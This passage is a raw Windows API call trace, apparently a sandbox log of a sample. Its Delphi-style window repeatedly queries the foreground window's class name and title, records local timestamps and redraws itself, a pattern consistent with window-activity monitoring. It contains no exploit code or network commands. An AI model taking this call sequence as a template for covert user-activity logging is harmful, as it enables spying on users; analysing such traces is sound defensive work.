lpString=0xc02f) returned 0x0 [0283.697] GetParent (hWnd=0x100ca) returned 0x100c6 [0283.697] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0283.697] GetCurrentProcessId () returned 0x470 [0283.697] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0283.697] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0283.697] GetParent (hWnd=0x100c6) returned 0x0 [0283.697] IsWindowVisible (hWnd=0x10134) returned 1 [0283.697] IsWindowEnabled (hWnd=0x10134) returned 1 [0283.697] GetCurrentThreadId () returned 0x62c [0283.697] ResetEvent (hEvent=0x6f8) returned 1 [0283.697] GetCurrentThreadId () returned 0x62c [0283.697] GetCurrentThreadId () returned 0x62c [0283.697] GetCurrentThreadId () returned 0x62c [0283.697] WaitMessage () returned 1 [0284.946] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0284.946] IsWindowUnicode (hWnd=0x10114) returned 1 [0284.946] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0284.946] GetCapture () returned 0x0 [0284.946] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0284.947] GetCurrentProcessId () returned 0x470 [0284.947] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0284.947] GetPropW (hWnd=0x10114, lpString=0xc02f) returned 0x0 [0284.947] GetParent (hWnd=0x10114) returned 0x0 [0284.947] TranslateMessage (lpMsg=0x534f944) returned 0 [0284.947] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0284.947] GetForegroundWindow () returned 0x10134 [0284.947] SendMessageW (hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0284.947] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0284.947] GetCurrentThreadId () returned 0x62c [0284.947] GetCurrentThreadId () returned 0x62c [0284.947] GetCurrentThreadId () returned 0x62c [0284.947] GetCurrentThreadId () returned 0x62c [0284.947] GetCurrentThreadId () returned 0x62c [0284.947] GetCurrentThreadId () returned 0x62c [0284.947] GetClassNameW (in: hWnd=0x10134, lpClassName=0x534f50e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0284.947] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0284.947] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0284.947] WindowFromPoint (Point=0x594) returned 0x100cc [0284.947] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0284.947] GetCurrentProcessId () returned 0x470 [0284.947] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0284.947] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0284.947] GetParent (hWnd=0x100cc) returned 0x100ca [0284.948] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0284.948] GetCurrentProcessId () returned 0x470 [0284.948] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0284.948] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0284.948] GetParent (hWnd=0x100ca) returned 0x100c6 [0284.948] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0284.948] GetCurrentProcessId () returned 0x470 [0284.948] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0284.948] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0284.948] GetParent (hWnd=0x100c6) returned 0x0 [0284.948] IsWindowVisible (hWnd=0x10134) returned 1 [0284.948] IsWindowEnabled (hWnd=0x10134) returned 1 [0284.948] GetCurrentThreadId () returned 0x62c [0284.948] ResetEvent (hEvent=0x6f8) returned 1 [0284.948] GetCurrentThreadId () returned 0x62c [0284.948] GetCurrentThreadId () returned 0x62c [0284.948] GetCurrentThreadId () returned 0x62c [0284.948] WaitMessage () returned 1 [0285.291] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0285.291] IsWindowUnicode (hWnd=0x10112) returned 1 [0285.291] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0285.291] GetCapture () returned 0x0 [0285.291] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0285.291] GetCurrentProcessId () returned 0x470 [0285.291] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0285.291] GetPropW (hWnd=0x10112, lpString=0xc02f) returned 0x0 [0285.291] GetParent (hWnd=0x10112) returned 0x0 [0285.291] TranslateMessage (lpMsg=0x534f944) returned 0 [0285.291] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0285.291] GetForegroundWindow () returned 0x100cc [0285.291] GetClassNameW (in: hWnd=0x100cc, lpClassName=0x534f50e, nMaxCount=256 | out: lpClassName="SysListView32") returned 13 [0285.291] GetWindowTextW (in: hWnd=0x100cc, lpString=0x534f5b0, nMaxCount=256 | out: lpString="FolderView") returned 10 [0285.292] GetLocalTime (in: lpSystemTime=0x534f3d4 | out: lpSystemTime=0x534f3d4*(wYear=0x7e0, wMonth=0x9, wDayOfWeek=0x5, wDay=0x2, wHour=0xa, wMinute=0x0, wSecond=0x8, wMilliseconds=0x10b)) [0285.292] InvalidateRect (hWnd=0x10134, lpRect=0x534f24c, bErase=1) returned 1 [0285.292] GetDC (hWnd=0x0) returned 0x40101b8 [0285.292] MoveToEx (in: hdc=0x40101b8, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0285.292] SelectObject (hdc=0x40101b8, h=0xb0a0227) returned 0x18a002e [0285.292] GetSysColor (nIndex=8) returned 0x0 [0285.292] SetTextColor (hdc=0x40101b8, color=0x0) returned 0x0 [0285.292] SelectObject (hdc=0x40101b8, h=0x830021e) returned 0x1b00017 [0285.292] SetROP2 (hdc=0x40101b8, rop2=13) returned 13 [0285.292] UnrealizeObject (h=0xc100741) returned 1 [0285.292] SelectObject (hdc=0x40101b8, h=0xc100741) returned 0x1900010 [0285.292] SetBkColor (hdc=0x40101b8, color=0xffffff) returned 0xffffff [0285.292] SetBkMode (hdc=0x40101b8, mode=2) returned 2 [0285.292] GetSysColor (nIndex=8) returned 0x0 [0285.292] GetSysColor (nIndex=14) returned 0xffffff [0285.292] DrawThemeTextEx () returned 0x0 [0285.292] SelectObject (hdc=0x40101b8, h=0x1b00017) returned 0x830021e [0285.293] SelectObject (hdc=0x40101b8, h=0x1900015) returned 0xc100741 [0285.293] SelectObject (hdc=0x40101b8, h=0x18a002e) returned 0xb0a0227 [0285.293] GetCurrentPositionEx (in: hdc=0x40101b8, lppt=0x534f21c | out: lppt=0x534f21c) returned 1 [0285.293] ReleaseDC (hWnd=0x0, hDC=0x40101b8) returned 1 [0285.293] InvalidateRect (hWnd=0x10134, lpRect=0x534f208, bErase=1) returned 1 [0285.293] InvalidateRect (hWnd=0x10134, lpRect=0x534f204, bErase=1) returned 1 [0285.293] IsIconic (hWnd=0x10134) returned 0 [0285.293] GetClientRect (in: hWnd=0x10134, lpRect=0x534f200 | out: lpRect=0x534f200) returned 1 [0285.293] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0285.293] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0285.293] WindowFromPoint (Point=0x594) returned 0x100cc [0285.293] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0285.293] GetCurrentProcessId () returned 0x470 [0285.293] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0285.293] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0285.293] GetParent (hWnd=0x100cc) returned 0x100ca [0285.293] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0285.293] GetCurrentProcessId () returned 0x470 [0285.293] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0285.293] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0285.293] GetParent (hWnd=0x100ca) returned 0x100c6 [0285.293] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0285.293] GetCurrentProcessId () returned 0x470 [0285.293] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0285.293] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0285.294] GetParent (hWnd=0x100c6) returned 0x0 [0285.294] IsWindowVisible (hWnd=0x10134) returned 1 [0285.294] IsWindowEnabled (hWnd=0x10134) returned 1 [0285.294] GetCurrentThreadId () returned 0x62c [0285.294] ResetEvent (hEvent=0x6f8) returned 1 [0285.294] GetCurrentThreadId () returned 0x62c [0285.294] GetCurrentThreadId () returned 0x62c [0285.294] GetCurrentThreadId () returned 0x62c [0285.294] WaitMessage () returned 1 [0285.991] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0285.991] IsWindowUnicode (hWnd=0x10114) returned 1 [0285.991] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0285.991] GetCapture () returned 0x0 [0285.991] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0285.991] GetCurrentProcessId () returned 0x470 [0285.991] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0285.991] GetPropW (hWnd=0x10114, lpString=0xc02f) returned 0x0 [0285.991] GetParent (hWnd=0x10114) returned 0x0 [0285.991] TranslateMessage (lpMsg=0x534f944) returned 0 [0285.991] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0285.991] GetForegroundWindow () returned 0x10134 [0285.991] SendMessageW (hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0285.991] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0285.991] GetCurrentThreadId () returned 0x62c [0285.991] GetCurrentThreadId () returned 0x62c [0285.991] GetCurrentThreadId () returned 0x62c [0285.991] GetCurrentThreadId () returned 0x62c [0285.991] GetCurrentThreadId () returned 0x62c [0285.991] GetCurrentThreadId () returned 0x62c [0285.991] GetClassNameW (in: hWnd=0x10134, lpClassName=0x534f50e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0285.991] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0285.991] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0285.992] WindowFromPoint (Point=0x594) returned 0x100cc [0285.992] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0285.992] GetCurrentProcessId () returned 0x470 [0285.992] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0285.992] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0285.992] GetParent (hWnd=0x100cc) returned 0x100ca [0285.992] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0285.992] GetCurrentProcessId () returned 0x470 [0285.992] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0285.992] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0285.992] GetParent (hWnd=0x100ca) returned 0x100c6 [0285.992] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0285.992] GetCurrentProcessId () returned 0x470 [0285.992] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0285.992] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0285.992] GetParent (hWnd=0x100c6) returned 0x0 [0285.992] IsWindowVisible (hWnd=0x10134) returned 1 [0285.992] IsWindowEnabled (hWnd=0x10134) returned 1 [0285.992] GetCurrentThreadId () returned 0x62c [0285.992] ResetEvent (hEvent=0x6f8) returned 1 [0285.992] GetCurrentThreadId () returned 0x62c [0285.992] GetCurrentThreadId () returned 0x62c [0285.992] GetCurrentThreadId () returned 0x62c [0285.992] WaitMessage () returned 1 [0286.831] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0286.831] IsWindowUnicode (hWnd=0x10112) returned 1 [0286.831] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0286.831] GetCapture () returned 0x0 [0286.831] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0286.831] GetCurrentProcessId () returned 0x470 [0286.831] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0286.831] GetPropW (hWnd=0x10112, lpString=0xc02f) returned 0x0 [0286.831] GetParent (hWnd=0x10112) returned 0x0 [0286.831] TranslateMessage (lpMsg=0x534f944) returned 0 [0286.831] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0286.831] GetForegroundWindow () returned 0x10134 [0286.831] GetClassNameW (in: hWnd=0x10134, lpClassName=0x534f50e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0286.831] GetWindowTextW (in: hWnd=0x10134, lpString=0x534f5b0, nMaxCount=256 | out: lpString="k8w0") returned 4 [0286.831] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0286.831] GetCurrentThreadId () returned 0x62c [0286.831] GetCurrentThreadId () returned 0x62c [0286.831] GetCurrentThreadId () returned 0x62c [0286.831] GetCurrentThreadId () returned 0x62c [0286.831] GetCurrentThreadId () returned 0x62c [0286.831] GetCurrentThreadId () returned 0x62c [0286.832] GetLocalTime (in: lpSystemTime=0x534f3d4 | out: lpSystemTime=0x534f3d4*(wYear=0x7e0, wMonth=0x9, wDayOfWeek=0x5, wDay=0x2, wHour=0xa, wMinute=0x0, wSecond=0x9, wMilliseconds=0x30d)) [0286.832] InvalidateRect (hWnd=0x10134, lpRect=0x534f24c, bErase=1) returned 1 [0286.832] GetDC (hWnd=0x0) returned 0x40101b8 [0286.832] MoveToEx (in: hdc=0x40101b8, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0286.832] SelectObject (hdc=0x40101b8, h=0xb0a0227) returned 0x18a002e [0286.832] GetSysColor (nIndex=8) returned 0x0 [0286.832] SetTextColor (hdc=0x40101b8, color=0x0) returned 0x0 [0286.832] SelectObject (hdc=0x40101b8, h=0x830021e) returned 0x1b00017 [0286.832] SetROP2 (hdc=0x40101b8, rop2=13) returned 13 [0286.832] UnrealizeObject (h=0xc100741) returned 1 [0286.832] SelectObject (hdc=0x40101b8, h=0xc100741) returned 0x1900010 [0286.832] SetBkColor (hdc=0x40101b8, color=0xffffff) returned 0xffffff [0286.832] SetBkMode (hdc=0x40101b8, mode=2) returned 2 [0286.832] GetSysColor (nIndex=8) returned 0x0 [0286.832] GetSysColor (nIndex=14) returned 0xffffff [0286.832] DrawThemeTextEx () returned 0x0 [0286.832] SelectObject (hdc=0x40101b8, h=0x1b00017) returned 0x830021e [0286.832] SelectObject (hdc=0x40101b8, h=0x1900015) returned 0xc100741 [0286.832] SelectObject (hdc=0x40101b8, h=0x18a002e) returned 0xb0a0227 [0286.832] GetCurrentPositionEx (in: hdc=0x40101b8, lppt=0x534f21c | out: lppt=0x534f21c) returned 1 [0286.832] ReleaseDC (hWnd=0x0, hDC=0x40101b8) returned 1 [0286.833] InvalidateRect (hWnd=0x10134, lpRect=0x534f208, bErase=1) returned 1 [0286.833] InvalidateRect (hWnd=0x10134, lpRect=0x534f204, bErase=1) returned 1 [0286.833] IsIconic (hWnd=0x10134) returned 0 [0286.833] GetClientRect (in: hWnd=0x10134, lpRect=0x534f200 | out: lpRect=0x534f200) returned 1 [0286.833] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0286.833] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0286.833] WindowFromPoint (Point=0x594) returned 0x100cc [0286.833] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0286.833] GetCurrentProcessId () returned 0x470 [0286.833] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0286.833] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0286.833] GetParent (hWnd=0x100cc) returned 0x100ca [0286.833] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0286.833] GetCurrentProcessId () returned 0x470 [0286.833] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0286.833] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0286.833] GetParent (hWnd=0x100ca) returned 0x100c6 [0286.833] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0286.833] GetCurrentProcessId () returned 0x470 [0286.833] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0286.833] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0286.833] GetParent (hWnd=0x100c6) returned 0x0 [0286.833] IsWindowVisible (hWnd=0x10134) returned 1 [0286.833] IsWindowEnabled (hWnd=0x10134) returned 1 [0286.833] GetCurrentThreadId () returned 0x62c [0286.834] ResetEvent (hEvent=0x6f8) returned 1 [0286.834] GetCurrentThreadId () returned 0x62c [0286.834] GetCurrentThreadId () returned 0x62c [0286.834] GetCurrentThreadId () returned 0x62c [0286.834] WaitMessage () returned 1 [0287.002] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0287.003] IsWindowUnicode (hWnd=0x10114) returned 1 [0287.003] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0287.003] GetCapture () returned 0x0 [0287.003] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0287.003] GetCurrentProcessId () returned 0x470 [0287.003] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0287.003] GetPropW (hWnd=0x10114, lpString=0xc02f) returned 0x0 [0287.003] GetParent (hWnd=0x10114) returned 0x0 [0287.003] TranslateMessage (lpMsg=0x534f944) returned 0 [0287.003] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0287.003] GetForegroundWindow () returned 0x10134 [0287.003] SendMessageW (hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0287.003] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0287.003] GetCurrentThreadId () returned 0x62c [0287.003] GetCurrentThreadId () returned 0x62c [0287.003] GetCurrentThreadId () returned 0x62c [0287.003] GetCurrentThreadId () returned 0x62c [0287.003] GetCurrentThreadId () returned 0x62c [0287.003] GetCurrentThreadId () returned 0x62c [0287.003] GetClassNameW (in: hWnd=0x10134, lpClassName=0x534f50e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0287.003] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0287.003] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0287.003] WindowFromPoint (Point=0x594) returned 0x100cc [0287.003] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0287.003] GetCurrentProcessId () returned 0x470 [0287.004] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0287.004] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0287.004] GetParent (hWnd=0x100cc) returned 0x100ca [0287.004] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0287.004] GetCurrentProcessId () returned 0x470 [0287.004] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0287.004] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0287.004] GetParent (hWnd=0x100ca) returned 0x100c6 [0287.004] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0287.004] GetCurrentProcessId () returned 0x470 [0287.004] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0287.004] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0287.004] GetParent (hWnd=0x100c6) returned 0x0 [0287.004] IsWindowVisible (hWnd=0x10134) returned 1 [0287.004] IsWindowEnabled (hWnd=0x10134) returned 1 [0287.004] GetCurrentThreadId () returned 0x62c [0287.004] ResetEvent (hEvent=0x6f8) returned 1 [0287.004] GetCurrentThreadId () returned 0x62c [0287.004] GetCurrentThreadId () returned 0x62c [0287.004] GetCurrentThreadId () returned 0x62c [0287.004] WaitMessage () returned 1 [0288.016] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0288.016] IsWindowUnicode (hWnd=0x10114) returned 1 [0288.016] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0288.016] GetCapture () returned 0x0 [0288.016] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0288.016] GetCurrentProcessId () returned 0x470 [0288.016] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0288.017] GetPropW (hWnd=0x10114, lpString=0xc02f) returned 0x0 [0288.017] GetParent (hWnd=0x10114) returned 0x0 [0288.017] TranslateMessage (lpMsg=0x534f944) returned 0 [0288.017] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0288.017] GetForegroundWindow () returned 0x10134 [0288.017] SendMessageW (hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0288.017] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xd, wParam=0x100, lParam=0x534f5b0) returned 0x4 [0288.017] GetCurrentThreadId () returned 0x62c [0288.017] GetCurrentThreadId () returned 0x62c [0288.017] GetCurrentThreadId () returned 0x62c [0288.017] GetCurrentThreadId () returned 0x62c [0288.017] GetCurrentThreadId () returned 0x62c [0288.017] GetCurrentThreadId () returned 0x62c [0288.017] GetClassNameW (in: hWnd=0x10134, lpClassName=0x534f50e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0288.017] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 0 [0288.017] GetCursorPos (in: lpPoint=0x534f904 | out: lpPoint=0x534f904*(x=1428, y=797)) returned 1 [0288.017] WindowFromPoint (Point=0x594) returned 0x100cc [0288.017] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0288.017] GetCurrentProcessId () returned 0x470 [0288.017] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0288.017] GetPropW (hWnd=0x100cc, lpString=0xc02f) returned 0x0 [0288.017] GetParent (hWnd=0x100cc) returned 0x100ca [0288.017] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0288.018] GetCurrentProcessId () returned 0x470 [0288.018] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0288.018] GetPropW (hWnd=0x100ca, lpString=0xc02f) returned 0x0 [0288.018] GetParent (hWnd=0x100ca) returned 0x100c6 [0288.018] GetWindowThreadProcessId (in: hWnd=0x100c6, lpdwProcessId=0x534f8cc | out: lpdwProcessId=0x534f8cc) returned 0x474 [0288.018] GetCurrentProcessId () returned 0x470 [0288.018] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0288.018] GetPropW (hWnd=0x100c6, lpString=0xc02f) returned 0x0 [0288.018] GetParent (hWnd=0x100c6) returned 0x0 [0288.018] IsWindowVisible (hWnd=0x10134) returned 1 [0288.018] IsWindowEnabled (hWnd=0x10134) returned 1 [0288.018] GetCurrentThreadId () returned 0x62c [0288.018] ResetEvent (hEvent=0x6f8) returned 1 [0288.018] GetCurrentThreadId () returned 0x62c [0288.018] GetCurrentThreadId () returned 0x62c [0288.018] GetCurrentThreadId () returned 0x62c [0288.018] WaitMessage () returned 1 [0288.344] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0288.344] IsWindowUnicode (hWnd=0x10112) returned 1 [0288.344] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0288.344] GetCapture () returned 0x0 [0288.344] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0288.344] GetCurrentProcessId () returned 0x470 [0288.344] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0288.344] GetPropW (hWnd=0x10112, lpString=0xc02f) returned 0x0 [0288.344] GetParent (hWnd=0x10112) returned 0x0 [0288.344] TranslateMessage (lpMsg=0x534f944) returned 0 [0288.344] DispatchMessageW (lpMsg=0x534f944) returned 0x0 [0288.344] GetForegroundWindow () returned 0x100cc [0288.344] GetClassNameW (in: hWnd=0x100cc, lpClassName=0x534f50e, nMaxCount=256 | out: lpClassName="SysListView32") returned 13 [0288.344] GetWindowTextW (in: hWnd=0x100cc, lpString=0x534f5b0, nMaxCount=256 | out: lpString="FolderView") returned 10 [0288.345] GetLocalTime (in: lpSystemTime=0x534f3d4 | out: lpSystemTime=0x534f3d4*(wYear=0x7e0, wMonth=0x9, wDayOfWeek=0x5, wDay=0x2, wHour=0xa, wMinute=0x0, wSecond=0xb, wMilliseconds=0x126)) [0288.345] InvalidateRect (hWnd=0x10134, lpRect=0x534f24c, bErase=1) returned 1 [0288.345] GetDC (hWnd=0x0) returned 0x40101b8 [0288.345] MoveToEx (in: hdc=0x40101b8, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0288.345] SelectObject (hdc=0x40101b8, h=0xb0a0227) returned 0x18a002e [0288.345] GetSysColor (nIndex=8) returned 0x0 [0288.345] SetTextColor (hdc=0x40101b8, color=0x0) returned 0x0 [0288.345] SelectObject 